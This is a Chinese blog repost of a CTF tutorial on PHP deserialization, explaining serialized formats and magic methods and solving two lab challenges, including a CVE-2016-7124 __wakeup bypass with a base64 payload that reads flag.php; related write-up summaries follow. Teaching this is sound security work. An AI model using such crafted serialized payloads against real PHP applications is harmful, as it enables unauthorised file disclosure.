unserialize3

最新推荐文章于 2024-09-19 22:11:50 发布
最新推荐文章于 2024-09-19 22:11:50 发布
阅读量366 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_31884905/article/details/113871646
版权

CTF竞赛 | PHP反序列化基础

原创 betaseclabs 贝塔安全实验室 1周前
通过序列化与反序列化我们可以很方便的在PHP中传递对象,下面小编给大家介绍反序列化的原理和一些常见的利用方式。

01

序列化和反序列化概述

(1)序列化和反序列化:
序列化:将对象的状态信息转换成可存储或者传输的形式过程;
反序列化:将可存储或者传输的形式过程恢复为对象的过程;
存储形式:二进制、XML、JSON

(2)常见反序列化漏洞:
Weblogic: CVE-2018-2893、CVE-2018-2628、CVE-2017-10271
Jboss: CVE-2017-12149、CVE-2017-7504
Jenkins:CVE-2017-1000353、CVE-2016-0792
NODE.JS CVE-2017-5941

(3) 访问控制修饰符
根据访问控制修饰符的不同序列化后的属性长度和属性值会有所不同:
public:公有;
protected:受保护的,被序列化的时候属性值会变成:%00*%00属性名;
private:私有的,属性被序列化的时候属性值会变成:%00类名%00属性名;

序列化示例

<?php      
class test{             
  private $flag = "flag{this-is-flag}";             
  public $a = "snail";             
  static  $b = "beta";         
}     

$test = new test;     //建立一个test的对象;
$data = serialize($test);   //将对象进行序列化;
echo $data; 
?>

图片

各个字段的解释如下所示:

O:#指Object(对象)
4:#代表对象的名称有4个字符,如test包含4个字符;
test:#表示test对象;
2:#表示2个属性值;
s:#表示字符串;
10:#表示属性名长度;
testflag: #表示属性名;
s:18:“flag(this-is-flag)” #字符串,属性值长度,属性值;

反序列化示例

<?php      
class test{             
  private $flag = "flag{this-is-flag}";             
  public $a = "snail";             
  static $b = "beta";         
}     
$test = new test;  //建立一个test的对象;    
$data = serialize($test);   //将对象进行序列化;    
$undata = unserialize($data);     
var_dump($undata); 
?>

图片

02

反序列化中常用的魔术函数

在利用对PHP反序列化进行利用时,经常需要通过反序列化中的魔术方法,检查方法里有无敏感操作来进行利用。下面列举了序列化与反序列化过程中常用的几个魔术函数:

__construct() #当一个对象创建时触发
__destruct() #当一个对象被销毁时触发
__toString() #把类当作字符串使用时触发
__call() #在对象上下文中调用不可访问的方法时触发
__callStatic() #在静态上下文中调用不可访问的方法时触发
__get() #用于从不可访问的属性读取数据时
__set() #用于将数据写入不可访问的属性
__wakeup() #使用unserialize时触发 ,unserialize() 会检查是否存在一个 __wakeup() 方法。
__sleep() #使用serialize时触发,serialize() 函数会检查类中是否存在一个魔术方法 __sleep()。
__isset() #在不可访问的属性上调用isset()或empty()触发
__unset() #在不可访问的属性上使用unset()时触发
__invoke() #当脚本尝试将对象调用为函数时触发
__autoload() #尝试加载未定义的类时触发
__clone() #当对象复制完成时触发

03

小试牛刀

D0g3平台上一道简单的反序列化的题,通过GET请求方式读取str内容,并进行反序列化等于$KEY就可以获取flag内容了。题目代码如下所示:

<?php 
error_reporting(0); 
include "flag.php"; 
$KEY = "D0g3!!!"; 
$str = $_GET['str']; 
if (unserialize($str) === "$KEY") {         
echo "$flag"; 
} 
show_source(__FILE__);

通过本地生成序列化字符串

<?php      
class test{                        
  protected $a = "D0g3!!!";                  
}    
$test = new test;     //建立一个test的对象;
$data = serialize($test);   //将对象进行序列化;
echo $data; 
?>

图片

payload:http://127.0.0.1/web/web1/unserialize.php?str=s:7:“D0g3!!!”;

图片

04

菜鸟进阶

如下所示,为本道题的源码,通过 __destruct 方法中 show_source(dirname (FILE).’/’.$this ->file); 读取flag.php,构造序列化对象然后base64编码,经过unserialize将file设为flag.php,但是,进行反序列化之前会优先执行__wakeup()函数,将file设置成index.php。所以此处需要绕过__wakeup()函数。此处就要用到CVE-2016-7124漏洞,当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行。

<?php    
class SoFun{    
  protected $file='index.php';   
  function __destruct(){      
    if(!empty($this->file)) {       
    if(strchr($this-> file,"\\")===false &&  strchr($this->file, '/')===false)         
    show_source(dirname (__FILE__).'/'.$this ->file);       
  else         
  die('Wrong filename.');     
  }   
  }     
  function __wakeup(){    
  $this-> file='index.php';   
  }    
  public function __toString() { return '' ; 
  }   
}      
if (!isset($_GET['file'])){    
show_source('index.php'); 
} 
else{    
$file=base64_decode($_GET['file']); 
echo $file;   
echo unserialize($file); }  #<!--key in flag.php-->

通过本地生成序列化字符串

<?php      
class SoFun{                        
    protected $file = "flag.php";                 
}    
$test = new SoFun;     //建立一个test的对象;     
$data = serialize($test);   //将对象进行序列化;     
echo $data; 
?>

此处注意两点:
对象属性个数的值大于真实的属性个数;
s符号要进行大写;

图片

转成base64编码,payload如下所示:

payload: Tzo1OiJTb0Z1biI6Mjp7Uzo3OiJcMDAqXDAwZmlsZSI7czo4OiJmbGFnLnBocCI7fQ==

图片

https://mp.weixin.qq.com/s/XayyZSyt7bJpOg3su9Ks-A
https://mp.weixin.qq.com/s/XayyZSyt7bJpOg3su9Ks-A
https://mp.weixin.qq.com/s/XayyZSyt7bJpOg3su9Ks-A

王俊凯迷妹
关注
【网络安全 | CTF】unserialize3解题详析(php序列化反序列化实例讲解)
等风来
05-21 5092
在 PHP 中,可以使用 serialize() 函数将对象序列化为字符串,然后保存到文件或传输到其他应用程序中。在 PHP 中,可以使用 unserialize() 函数将序列化后的字符串还原为原始的对象或数据,然后进行处理。对象被序列化并存储为字符串后,如果再次反序列化该字符串并尝试重建相应的对象时,PHP 就会自动调用该对象的。则是将序列化后的数据重新转换为对象、数据结构或变量的过程,以便在程序中进行操作或处理。在反序列化对象时自动调用,用于初始化对象的属性等操作。的对象,该对象有一个属性。
unserialize3 反序列化
Rashu99's blog
09-01 307
参考blog 攻防世界 web进阶 unserialize3 题目 运行得到 重点关注被序列化的对象属性个数 当序列化字符串当中属性个数值大于实际的属性个数时,就会导致反序列化异常,从而跳过__wakeup函数 与序列化和反序列化的魔术方法主要是: __construct() //当一个对象创建时被调用 __destruct() //对象被销毁时触发 __wakeup() //使用unserialize时触发 __sleep() //使用serialize时触发 __toString() /
攻防世界: WEB——unserialize3
Zeker62的博客
08-23 321
靶场内容 题目:反序列化——说明和反序列化有关 打开靶场:PHP代码——PHP反序列化 solution 这个靶场出来之后,显示出来是一个不完整的PHP代码——括号都没有完全闭合 开始分析: __wakeup()属于魔术方法,通常用于反序列化中。 unserialize() 反序列化函数会检查是否存在一个 __wakeup() 方法。如果存在,则会先调用 __wakeup 方法,预先准备对...
unserialize3(php序列化、反序列化及绕过)
Welcome To Myon'Blog !
03-27 813
PHP基础知识与理解,__wakeup()函数,new函数,PHP的序列化与反序列化,局部变量与全局变量,payload构造,脚本编写,绕过,get传参
攻防世界(WEB)——unserialize3
最新发布
NanGuai的博客
09-19 462
与大部分面向对象的语言类似,PHP在使用完一个对象后会将其销毁。当下某个页面要使用同一个对象时,为了避免出现找不到该对象的窘况,需要有一种方法能够将对象保存下来。以下是题目中给出的PHP代码,可以看到代码有缺失。此外,代码中还提示了我们有可能需要将已经序列化的参数传递给code变量。执行,需要使反序列失败。因此需要在不更改序列化值格式的前提下对其作出修改,然后传给。因为没有给出描述,但是根据题目可以看出来这道与。我们尝试将它补全并打印出对象的序列化值。这里我们先搞清楚什么是反序列化。
XCTF-高手进阶区:unserialize3
1stPeak's Blog
06-24 3926
XCTF-高手进阶区-第六题:unserialize3 目标: 了解php反序列化中__wakeup漏洞的利用 了解php魔术方法 __construct(), __destruct(), __call(), __callStatic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(), __toStri...
攻防世界 unserialize3
weixin_52268949的博客
01-28 1485
unserialize3 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } ?code= 进入题目给出部分代码,注意发现到有个wakeup()函数,我们要想办法绕过这个函数,wakeup()有个执行漏洞:一个字符串或对象被序列化后,如果其属性被修改,则不会执行wakeup()函数,这也算是一个绕过点 我们编写exp class xctf { public $flag = '
【攻防世界】unserialize3
m0_74979597的博客
07-12 2181
序列化和反序列化是将数据结构或对象转换为可存储或传输的格式,以便在需要时可以重新创建它们的过程。序列化将数据结构或对象转换为字节流或字符串,而反序列化将字节流或字符串转换回原始数据结构或对象。在计算机科学中,序列化和反序列化是非常重要的概念,因为它们允许我们在不同的应用程序之间共享数据。例如,当我们将数据从一个应用程序发送到另一个应用程序时,我们需要将数据序列化为可传输的格式,然后在另一个应用程序中反序列化它以将其还原为原始数据结构或对象。
【攻防世界-Web进阶篇-005unserialize3
gyy990526的博客
03-14 2812
解:打开靶机是一段php代码,最后问你?code=应该等于多少,看见_wakeup()就是典型的反序列化的题。 题目比较简单,只有一个xctf类,首先需要对其实例化,再用serialize进行序列化输出字符串 : <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $xctf=new xc
Web CTF unserialize3 Writeup
qq_39596232的博客
08-06 1147
一、实验环境: 网页地址:http://111.198.29.45:58693/ Kali Linux 二、实验工具: 在线PHP执行环境(https://www.tutorialspoint.com/execute_php_online.php) 三、实验内容: 1、打开所给定的网页,显示如下内容: 从中我们可以看到有一段残缺的PHP代码,其中有一个xctf的类,类里面仅有一个成员变量$fla...
XCTF-unserialize3
weixin_45613760的博客
08-04 390
XCTF-unserialize3看到题目知道考察的是序列化与反序列化的知识下面是一个示例然后我们需要了解魔法方法__wakeup()看题传入序列化后的字符串利用__wakeup()漏洞 看到题目知道考察的是序列化与反序列化的知识 序列化(串行化):是将变量转换为可保存或传输的字符串的过程; 反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。 下面是一个示例 <?php class test { public $flag = "flag{xct
攻防世界之unserialize3
qq_44111753的博客
11-17 255
题目: WP: 新知识: serialize:序列化函数,将对象转化为可保存可传输的字符串 unserialize:反序列化,将字符串转为原来的对象 <?php $a = array('a' => 'Apple' ,'b' => 'banana' , 'c' => 'Coconut'); //序列化数组 $s = serialize($a); echo $s; //输出结果:a:3:{s:1:"a";s:5:"Apple";s:1:"b";s:6:"banana";s:1:"c"
攻防世界-unserialize3
weixin_62608816的博客
07-13 1048
这是一个利用反序列字符串来进行绕过的题,根据提示我们要构造code参数,但是需要绕过wakeup函数查找资料得知wakeup为魔法函数,在进行unserialize反序列化的时候,首先就要查看有无该函数有的话 就会先执行他:绕过: 通过测试发现可以通过增加对象的属性个数来进行绕过,根据源码编辑php脚本输出序列化字符串: ​ 将对象属性由1变为2得到** 由此可以构造payload 拿到flag:...
攻防世界Web unserialize3
hhh
05-07 1330
unserialize3 啊啊啊啊好累不想写题解 ------------------------------------------------------------------------------------------------正经的分割线 主要考查了反序列化中的__wakeup函数的漏洞: 一个字符串或对象被序列化后,如果其属性被修改,则不会执行__wakeup()函数,可...
攻防世界_WEB: unserialize3
qq_46110224的博客
08-13 157
class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 可以看到__wakeup()函数,此函数常用于反序列化当中。 了解序列化与反序列化点这里 但是这里没有对任何字符串进行反序列化,所以我们尝试将该类实例化后再进行序列化。实例化就是使用new申请新空间,此方法适用于类的操作。例如: class a{ public i=0; } $c = new a(); /*此时 $
CTF做题笔记--unserialize3
Hasur的博客
03-03 413
如果我们按照上图的方式,直接将获取的字符串输入进去,发现wakeup()函数成功的调用了,为了让他不被使用,我们可以将里面的属性值1改成其他任意大于他的数字就可以获得flag。序列化指的是:是将变量转换为可保存或传输的字符串的过程,反序列化就是一个相反的过程。通过观察,在这里有一个wakeup()函数,我们就可以得知这是一个反序列化的漏洞。所以在这道题目中,我们需要去确认一下该序列化字符串的属性值。这道题主要是考察大家反序列化的知识,我们先来进入一下题目。在这里我们先介绍一下什么叫序列化,
攻防世界——web——unserialize3(反序列化)
m0_75007575的博客
04-05 917
一、序列化 将对象的状态信息转换为可以存储或传输的形式的过程,简单来说,就是将对象转化为字节序列的过程 二、反序列 把字节序列恢复为对象的过程称为对象反序列
攻防世界-Web进阶区-unserialize3
分享与记录
06-14 641
之前其实就记录过一篇反序列化的。PHP反序列化-(web_php_unserialize)那个反序列化的题目,比这个复杂一些。既然好久没练,而且在攻防世界上看到了这个 unserialize3 的题目,就复习一下反序列化吧。先 new 一个对象,然后将其序列化,代码如下: 序列化的结果如下: 表示序列化的对象中只有一个属性,如果待反序列化的字符串中,属性个数与实际不符合,则 失效。因此,将 改为 绕过 。传参结果如下:......
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值